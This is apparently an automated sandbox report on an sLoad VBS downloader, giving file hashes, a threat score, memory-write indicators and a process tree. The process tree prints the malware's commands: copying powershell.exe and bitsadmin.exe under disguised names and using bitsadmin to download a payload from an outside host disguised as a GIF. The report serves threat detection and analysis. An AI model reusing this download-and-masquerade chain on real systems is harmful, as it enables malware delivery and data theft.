sload | f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505

Analysis

Target

Allegato_doc_04198100168.vbs
Size

4KB
MD5

f13bf18a35cf7439790d91456f60f10b
SHA1

b8a280fb97a3aa64edbefda20d0463fcc2715d88
SHA256

f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505
SHA512

365fb9e10566b33814b8eece5a09df71f3e406547284ae31500fc3715420595d30b7226fb596c2c5dd66a5c65d12d35f36ab28a9bdcc8e29a6f5246de533981b

Score

10^/10

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 1 IoCs

pid	Process
1832	mvSS.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1316 wrote to memory of 1508	1316	WScript.exe	25
PID 1316 wrote to memory of 1508	1316	WScript.exe	25
PID 1316 wrote to memory of 1508	1316	WScript.exe	25
PID 1316 wrote to memory of 1800	1316	WScript.exe	27
PID 1316 wrote to memory of 1800	1316	WScript.exe	27
PID 1316 wrote to memory of 1800	1316	WScript.exe	27
PID 1316 wrote to memory of 1832	1316	WScript.exe	29
PID 1316 wrote to memory of 1832	1316	WScript.exe	29
PID 1316 wrote to memory of 1832	1316	WScript.exe	29
PID 1316 wrote to memory of 1832	1316	WScript.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_04198100168.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zmvSS.exe
  2⤵
  PID:1508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\mvSS.exe
  2⤵
  PID:1800
- C:\Users\Admin\AppData\Roaming\mvSS.exe
  "C:\Users\Admin\AppData\Roaming\mvSS.exe" /transfer CZZkYL /download https://sapphireloading.com/sal/04198100168/blank.gif C:\Users\Admin\AppData\Roaming\blank.gif
  2⤵
  - Executes dropped EXE
  PID:1832